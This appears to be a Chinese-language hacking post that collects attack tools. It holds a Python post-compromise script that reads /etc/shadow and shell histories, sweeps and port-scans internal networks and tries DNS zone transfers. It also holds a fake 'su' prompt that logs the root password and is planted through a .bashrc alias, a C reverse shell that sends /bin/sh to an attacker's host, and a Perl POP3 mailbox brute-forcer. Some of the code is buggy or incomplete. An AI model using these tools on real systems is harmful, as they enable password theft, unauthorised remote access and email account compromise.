bug : linux下的语法有些报错、linux下的ip存活判断有些问题
- #!/usr/bin/python
- # -*- coding: cp936 -*-
- #coding:utf-8
- import os
- import getpass
- import time
- import socket
- import re
- '''''for portscan'''
- from threading import Thread
- from Queue import Queue
- import platform
- import types
- from subprocess import Popen, PIPE
- '''''for dns'''
- import struct
- import sys
- class InScaner:
- def __init__(self,domain):
- self.NUM = 200
- self._re_IP = r'\d+\.\d+\.\d+\.\d+'
- self._re_startwithIP = r'^\d+\.\d+\.\d+\.\d+.*'
- self._re_network = r'^\d+\.\d+\.\d+'
- self.re_ip = re.compile(self._re_IP)
- self.re_startwithIP = re.compile(self._re_startwithIP)
- self.re_network = re.compile(self._re_network)
- self.host_ip = socket.gethostbyname(socket.gethostname())
- self.domain = domain
- self.path=os.getcwd()
- self.host_hostname = ''#os.popen('hostname').read()
- self.host_id = ''#os.popen('id').read()
- self.host_userlist=[]
- self.host_useronline=''
- self.host_last=''
- self.host_systemId = ''#os.popen('uname -a').read()
- self.host_systemversion = ''
- self.host_shadow = ''
- self.host_issue = ''
- self.host_bash_history = []
- self.host_services = '' #未进行识别
- self.host_ESTABLISHEDlink = ''
- self.host_hackCmd = []
- self.host_complie = []
- self.dns=[]
- #self.dns=['']
- self.etc_hosts=[]
- self.ifconfig=''
- self.arp=''
- self.route=''
- self.inerwww=''
- self.internetout=''
- self.keyip=[]
- self.keyipmaybe=[]
- self.networkmaybe=[]
- self.network = []#格式
- self.q = Queue()
- self.s = Queue()
- self.networkIPlistA = []
- self.portlist = [21,22,23,25,80,81,443,1433,1521,3306,3398,5800,5900,5901,5902,6379,7001,7002,7070,8080,8081,8181,8888,9090,9200,27017,28018]
- self.networkIP_portOpen={}
- self.networkIP_weakPass={}
- def HostInfoGet(self):
- print '###################Get localhost information####################'
- print '#####localhost IP####'
- print self.host_ip+'\n'
- _hostcmdList = [
- 'hostname',#主机名
- 'id', #用户id
- '''''
- cat /etc/passwd|grep -v nologin|grep -v halt|grep -v shutdown|awk -F":" '{ print $1"|"$3"|"$4}'
- ''',
- 'w',
- 'last',
- 'uname -a',
- 'cat /etc/issue',
- ]
- print '#####Get hostname#####'
- self.host_hostname = os.popen(_hostcmdList[0]).read()
- print self.host_hostname
- print '#####Get current user#####'
- self.host_id = os.popen(_hostcmdList[1]).read()
- print self.host_id
- print '#####Get users informaintion#####'
- userlist = os.popen(_hostcmdList[2]).read()
- self.host_userlist = userlist.split('\n')
- print userlist
- print '#####Get online users list#####'
- self.host_useronline = os.popen(_hostcmdList[3]).read()
- print self.host_useronline
- print '#####Get users login history#####'
- self.host_last = os.popen(_hostcmdList[4]).read()
- print self.host_last
- print '#####Get linux kernel version#####'
- self.host_systemId = os.popen(_hostcmdList[5]).read()
- print self.host_systemId
- print '#####Get linux press version#####'
- self.host_systemversion = os.popen(_hostcmdList[6]).read()
- print self.host_systemversion
- print '#####Get import local files#####'
- _hostfileList = [
- 'cat /etc/shadow',
- 'cat ~/.bash_history',
- 'cat /root/.bash_history'
- ]
- print '#####Get shadow#####'
- self.host_shadow = os.popen(_hostfileList[0]).read()
- print self.host_shadow
- print '#####Get bash_history#####'
- self.host_bash_history.append(os.popen(_hostfileList[1]).read())
- self.host_bash_history.append(os.popen(_hostfileList[2]).read())
- print '###Get too much###'
- _servicecmdlist = [
- 'netstat -antlp',
- '''''
- netstat -antlp | grep 'ESTABLISHED'
- '''
- ]
- print '#####Get system services and listening Port#####'
- self.host_services = os.popen(_servicecmdlist[0]).read()
- print self.host_services
- print '#####Get network ESTABLISHED#####'
- self.host_ESTABLISHEDlink = os.popen(_servicecmdlist[1]).read()
- print self.host_ESTABLISHEDlink
- print '#####Get cmd can be used#####'
- _host_hackSoft = [
- 'nmap',
- 'nc',
- 'netcat',
- 'wget',
- 'tcpdump',
- 'wireshark',
- 'rpm',
- 'yum',
- 'apt-get',
- 'ftp',
- 'ssh',
- 'telnet',
- 'scp',
- 'nslookup'
- ]
- for cmd in _host_hackSoft:
- typecmd = 'type '+cmd+' >/dev/null'
- try:
- out = os.system(typecmd)
- if 0 == out:
- self.host_hackCmd.append(cmd)
- print '%s is ok' % cmd
- except:
- print '%s is unused' % cmd
- print '###################Get localhost information finished####################\n'
- def mgFileGet(self):
- print '##########获取口令密码文件中。。。。。。##########'
- print 'PHP'
- print 'tomcat'
- print 'apache'
- print 'struts'
- print 'jboss'
- print 'weblogic'
- print 'ftp'
- print 'ssh'
- print 'vnc'
- print 'mysql'
- print 'oracle'
- print 'search'
- pass
- def NetworkInfoGet(self):
- print '####################Get network information####################'
- _netfileListCat = [
- 'cat /etc/hosts',
- 'cat /etc/resolv.conf',
- ]
- print '######Get DNS server IP#####'
- self.dns = self.re_ip.findall(os.popen(_netfileListCat[1]).read())
- for dns in self.dns:
- print dns
- print '#####Get /etc/hosts list#####'
- hosts = os.popen(_netfileListCat[0]).read().split('\n')
- for host in hosts:
- #print host
- _host=self.re_startwithIP.findall(host)
- if _host!=[]:
- self.etc_hosts += _host
- for host in self.etc_hosts:
- print host
- _netcmdList = [
- 'ifconfig -a',
- 'arp -a',
- 'route -n',
- 'ping %s -c 2' % self.domain,
- 'ping -c 2'
- ]
- print '#####Get localhost ip and interface information#####'
- self.ifconfig = os.popen(_netcmdList[0]).read()
- print self.ifconfig
- print '#####Get arp list#####'
- self.arp = os.popen(_netcmdList[1]).read()
- print self.arp
- print '#####Get route information#####'
- self.route = os.popen(_netcmdList[2]).read()
- print self.route
- print '#####Get innerDNSresolve test#####'
- self.inerwww = os.popen(_netcmdList[3]).read()
- print self.inerwww
- print '#####Can search the Internet or not#####'
- self.internetout = os.popen(_netcmdList[4]).read()
- print self.internetout
- print '#####DNS test#####'
- if self.dns == []:
- print 'sorry,we have no the dns ip'
- else:
- for dnsip in self.dns:
- print '###dns %s results###' % dnsip
- try:
- self.GetDomainList(dnsip,self.domain)
- except:
- print '##dns test failed##'
- #获取DNS域传送信息
- print '#####Network exist#####'
- #先收集所有结果中的IP地址,去掉排除的ip地址后,把ip地址转换为网段,之后去重,最后保存
- ip = []
- keyip = []
- keyipmaybe =[]
- network = []
- keynetwork = []
- keynetworkmaybe = []
- _ex_ip =[
- '',
- '',
- '',
- '',
- '',
- '',
- '',
- '',
- ''
- ]
- _iplistsearch = [
- self.host_useronline,
- self.host_last,
- self.host_services,
- self.host_ESTABLISHEDlink,
- self.dns,
- self.etc_hosts,
- self.ifconfig,
- self.arp,
- self.route,
- self.inerwww
- ]
- _iplistsearchmaybe = [
- self.host_bash_history
- ]
- for text in _iplistsearchmaybe:
- if type(text) == type('1'):
- ip+=self.__getIPinStr(text)
- elif type(text) == type(['1']):
- for text2 in text:
- ip+=self.__getIPinStr(text2)
- [keyipmaybe.append(ipnew) for ipnew in ip if ipnew not in (keyipmaybe+_ex_ip)]#ip地址处理
- self.keyipmaybe = keyipmaybe
- #变量中的IP并去重,去无效IP
- ip = []
- for text in _iplistsearch:
- if type(text) == type('1'):
- ip+=self.__getIPinStr(text)
- elif type(text) == type(['1']):
- for text2 in text:
- ip+=self.__getIPinStr(text2)
- [keyip.append(ipnew) for ipnew in ip if ipnew not in (keyip+_ex_ip)]#ip地址处理
- #将IP地址转换为网段,并去重
- self.keyip = keyip
- _ex_network =[
- ''
- ]
- for netip in self.keyipmaybe:
- network.append(self.__ip2network(netip))
- [keynetworkmaybe.append(net) for net in network if net not in keynetworkmaybe+_ex_network]
- network = []
- for netip in self.keyip:
- network.append(self.__ip2network(netip))
- [keynetwork.append(net) for net in network if net not in keynetwork+_ex_network]
- #筛选出私有IP地址
- _privatNet = [
- '172',
- '192',
- '10'
- ]
- print "network may exist:"
- for net in keynetworkmaybe:
- netsplit = net.split('.')
- if netsplit[0] in _privatNet:
- print net
- self.networkmaybe.append(net)
- print "network exists ensure:"
- for net in keynetwork:
- netsplit = net.split('.')
- if netsplit[0] in _privatNet:
- print net
- self.network.append(net)
- def __ip2network(self,ip):
- return self.re_network.findall(ip)[0]+'.0'
- def __getIPinStr(self,string):
- ip = self.re_ip.findall(string)
- return ip
- __LEN_QUERY = 0 # Length of Query String
- def __gen_query(self,domain):
- import random
- TRANS_ID = random.randint(1, 65535) # random ID
- data = struct.pack(
- '!HHHHHH',
- )
- query = ''
- for label in domain.strip().split('.'):
- query += struct.pack('!B', len(label)) + label.lower()
- query += '\x00' # end of domain name
- data += query
- global __LEN_QUERY
- __LEN_QUERY = len(query) # length of query section
- q_type = 252 # Type AXFR = 252
- q_class = 1 # CLASS IN
- data += struct.pack('!HH', q_type, q_class)
- data = struct.pack('!H', len(data) ) + data # first 2 bytes should be length
- return data
- __OFFvSET = 0 # Response Data offset
- __TYPES = {1: 'A', 2: 'NS', 5: 'CNAME', 6: 'SOA',
- 12: 'PTR', 15: 'MX', 16: 'TXT',
- 28: 'AAAA', 38: 'A6', 99: 'SPF',}
- def __decode(self,response):
- RCODE = struct.unpack('!H',response[2:4])[0] & 0b00001111
- if RCODE != 0:
- print 'Transfer Failed. %>_<%'
- sys.exit(-1)
- anwser_rrs = struct.unpack('!H', response[6:8] )[0]
- print '<< %d records in total >>' % anwser_rrs
- global __LEN_QUERY, __OFFSET
- __OFFSET = 12 + __LEN_QUERY + 4 # header = 12, type + class = 4
- while __OFFSET < len(response):
- name_offset = response[__OFFSET: __OFFSET + 2] # 2 bytes
- name_offset = struct.unpack('!H', name_offset)[0]
- if name_offset > 0b1100000000000000:
- name = self.__get_name(response, name_offset - 0b1100000000000000, True)
- else:
- name = self.__get_name(response, __OFFSET)
- type = struct.unpack('!H', response[__OFFSET: __OFFSET+2] )[0]
- type = self.__TYPES.get(type, '')
- if type != 'A': print name.ljust(20), type.ljust(10)
- __OFFSET += 8 # type: 2 bytes, class: 2bytes, time to live: 4 bytes
- data_length = struct.unpack('!H', response[__OFFSET: __OFFSET+2] )[0]
- if data_length == 4 and type == 'A':
- ip = [str(num) for num in struct.unpack('!BBBB', response[__OFFSET+2: __OFFSET+6] ) ]
- print name.ljust(20), type.ljust(10), '.'.join(ip)
- __OFFSET += 2 + data_length
- # is_pointer: an name offset or not
- def __get_name(self,response, name_offset, is_pointer=False):
- global __OFFSET
- labels = []
- while True:
- num = struct.unpack('B', response[name_offset])[0]
- if num == 0 or num > 128: break # end with 0b00000000 or 0b1???????
- labels.append( response[name_offset + 1: name_offset + 1 + num] )
- name_offset += 1 + num
- if not is_pointer: __OFFSET += 1 + num
- name = '.'.join(labels)
- __OFFSET += 2 # 0x00
- return name
- def GetDomainList(self,dnsip,domain):
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect( (dnsip, 53) )
- data = self.__gen_query(domain)
- s.send(data)
- s.settimeout(2.0) # In case recv() blocked
- response = s.recv(4096)
- res_len = struct.unpack('!H', response[:2])[0] # Response Content Length
- while len(response) < res_len:
- response += s.recv(4096)
- s.close()
- self.__decode(response[2:])
- def _ip2int(self,ip):
- return sum([256**j*int(i) for j,i in enumerate(ip.split('.')[::-1])])
- def _int2ip(self,intip):
- return '.'.join([str(intip/(256**i)%256) for i in range(3,-1,-1)])
- def __pingScan(self):
- while True:
- ip = self.q.get()
- if platform.system() == 'Linux':
- p = Popen(['ping','-c 2',ip],stdout=PIPE)
- m = re.search('ttl=', p.stdout.read())
- if m!=0:
- self.networkIPlistA.append(ip)
- if platform.system()=='Windows':
- p = Popen('ping -n 2 ' + ip, stdout=PIPE)
- m = re.search('TTL=', p.stdout.read())
- if m:
- self.networkIPlistA.append(ip)
- self.q.task_done()
- def __portScan(self):
- while True:
- scan = self.s.get()
- portConnect = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- portConnect.settimeout(100)
- try:
- portConnect.connect((scan[0],scan[1]))
- portConnect.close()
- self.networkIP_portOpen[scan[0]] += str(scan[1]) + ','
- #print self.networkIP_portOpen
- except Exception:
- pass
- #print e
- self.s.task_done()
- def PortScan(self):
- print '##########Start port scanning.....#########'
- print '###ip alive:###'
- if self.network == []:
- print '!!!!sorry,IP is NULL !!!!!'
- else:
- #得到要ping的ip列表:
- _pinglist = []
- for network in self.network:
- for i in range(1,255):
- _pinglist.append(self._int2ip(self._ip2int(network)+i))
- #开始执行
- for i in range(self.NUM):
- self.t = Thread(target = self.__pingScan)
- self.t.setDaemon(True)
- self.t.start()
- for ip in _pinglist:
- self.q.put(ip)
- self.q.join()
- #打印扫描存活IP列表结果,并给端口开发字典赋值
- for ip in self.networkIPlistA:
- self.networkIP_portOpen[ip]=''
- print ip
- print '###Port opening list...###'
- _scanlist = []
- for ip in self.networkIPlistA:
- for port in self.portlist:
- _scanlist.append([ip,port])
- for i in range(self.NUM):
- self.t2 = Thread(target = self.__portScan)
- self.t2.setDaemon(True)
- self.t2.start()
- for scan in _scanlist:
- self.s.put(scan)
- self.s.join()
- #print self.networkIP_portOpen
- #打印端口扫描结果:
- for ip in self.networkIPlistA:
- portlist = self.networkIP_portOpen[ip].split(',')
- #print portlist
- for port in portlist:
- if port != '':
- print '%s:%s' % (ip,port)
- #先ping,后直接进行TCP连接扫描
- print '##########Port scan finished##########'
- print '####################网络信息获取结束####################\n'
- def PassScan(self,hostsIP,service,port,username,password):
- #支持ssh、telnet、ftp、mysql、oralce
- print '##########Weak password scanning##########'
- return
- def GetRootPass(self): #测试用用不知道好不好用
- _file = open('~/.bashrc','a')
- _file.write("alias su=\’%s+/root.py\'") % self.path
- _file.close()
- current_time = time.strftime("%Y-%m-%d %H:%M")
- _logfile="%s+.su.log" % self.path #密码获取后记录在这里
- #CentOS
- #fail_str = "su: incorrect password"
- #Ubuntu
- #fail_str = "su: Authentication failure"
- #For Linux Korea #centos,ubuntu,korea 切换root用户失败提示不一样
- fail_str = "su: incorrect password"
- try:
- passwd = getpass.getpass(prompt='Password: ');
- _file = open(_logfile,'a').write("[%s]t%s"%(passwd, current_time))#截取root密码
- _file.write('\n')
- _file.close()
- except:
- pass
- time.sleep(1)
- print fail_str #打印切换root失败提示
- pass
- def Runall(self):
- pass
- if __name__ == '__main__':
- out=InScaner('ocellus.biz')
- out.HostInfoGet()
- out.NetworkInfoGet()
- out.PortScan()
- print '###########InScan finished###########'
- #!/usr/bin/python
- import os, sys, getpass, time
- current_time = time.strftime("%Y-%m-%d %H:%M")
- logfile="/dev/shm/.su.log" //密码获取后记录在这里
- #CentOS
- #fail_str = "su: incorrect password"
- #Ubuntu
- #fail_str = "su: Authentication failure"
- #For Linux Korea //centos,ubuntu,korea 切换root用户失败提示不一样
- fail_str = "su: incorrect password"
- try:
- passwd = getpass.getpass(prompt='Password: ');
- file=open(logfile,'a')
- file.write("[%s]t%s"%(passwd, current_time)) //截取root密码
- file.write('n')
- file.close()
- except:
- pass
- time.sleep(1)
- print fail_str //打印切换root失败提示
渗透linux拿到低权限并提权无果时,将这个程序传上去,再将一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py’; 低权限用户su root 后 成功记录密码。密码记录路径请看脚本
- #include
- #include
- #include
- #include
- #include
- void error(char *msg)
- {
- perror(msg);
- exit(0);
- }
- int main(int argc, char *argv[])
- {
- int sockfd, portno, lportno,n;
- struct sockaddr_in serv_addr;
- struct sockaddr_in client_addr;
- struct hostent *server;
- char buffer[256];
- if (argc < 3) {
- fprintf(stderr,"usage %s hostname port LocalPortn", argv[0]);
- exit(0);
- } //三个参数,目标主机,目标主机端口,本地源端口
- portno = atoi(argv[2]);
- sockfd = socket(AF_INET, SOCK_STREAM, 0);
- if (sockfd < 0)
- error("ERROR opening socket");
- bzero((char *) &client_addr, sizeof(client_addr));
- lportno = atoi(argv[3]);
- client_addr.sin_family = AF_INET;
- client_addr.sin_addr.s_addr = INADDR_ANY;
- client_addr.sin_port = htons(lportno); //设置源端口
- if (bind(sockfd, (struct sockaddr *) &client_addr,
- sizeof(client_addr)) < 0)
- error("ERROR on binding");
- server = gethostbyname(argv[1]);
- if (server == NULL) {
- fprintf(stderr,"ERROR, no such host ");
- exit(0);
- }
- bzero((char *) &serv_addr, sizeof(serv_addr));
- serv_addr.sin_family = AF_INET;
- bcopy((char *)server->h_addr,
- (char *)&serv_addr.sin_addr.s_addr,
- server->h_length);
- serv_addr.sin_port = htons(portno);
- if (connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0) //连接
- error("ERROR connecting");
- dup2(fd, 0);
- dup2(fd, 1);
- dup2(fd, 2);
- execl("/bin/sh","sh -i", NULL); //执行shell
- close(fd);
- }
- gcc client-port.c -o port
- chmod +x port
- ./port 你的IP 你的监听端口 本地的源端口
如 ./port http://www.91ri.org 80 80
成功反弹shell 提权成功
- #!/usr/bin/perl
- use Net::POP3;
- $email="pop.163.com"; //设置pop服务器地址 qq为pop.qq.com
- $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. ");
- print $pop->banner();
- $pop->quit;
- $i=0;
- open(fp1,"user.txt");
- @array1=<fp1>;
- open(fp2,"pass.txt");
- @array2=<fp2>; //从文件中获取邮箱用户名及密码
- foreach $a(@array1) {
- $u=substr($a,0,length($a)-1);
- $u=$u."@163.com";
- foreach $b(@array2) {
- $p=substr($b,0,length($b)-1);
- print "cracked with ".$u."-----".$p."n";
- $i=$i+1;
- $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. ");
- $m=$pop->login($u,$p); //尝试登录邮箱
- if($m>0)
- {
- print $u."------------".$p."----"."success"."n";
- $pop->quit;
- } //成功登录
- else
- {
- print $u."------------".$p."----"."failed"."n";
- $pop->quit; //登录失败
- }
- }
- }
- print $i;
用法 将要爆破的邮箱的pop服务器写入下面这一行 默认是163邮箱
- $email="pop.163.com";
再将去除掉@后面部分的邮箱地址比如[email protected] 去除后lusiyu存进去
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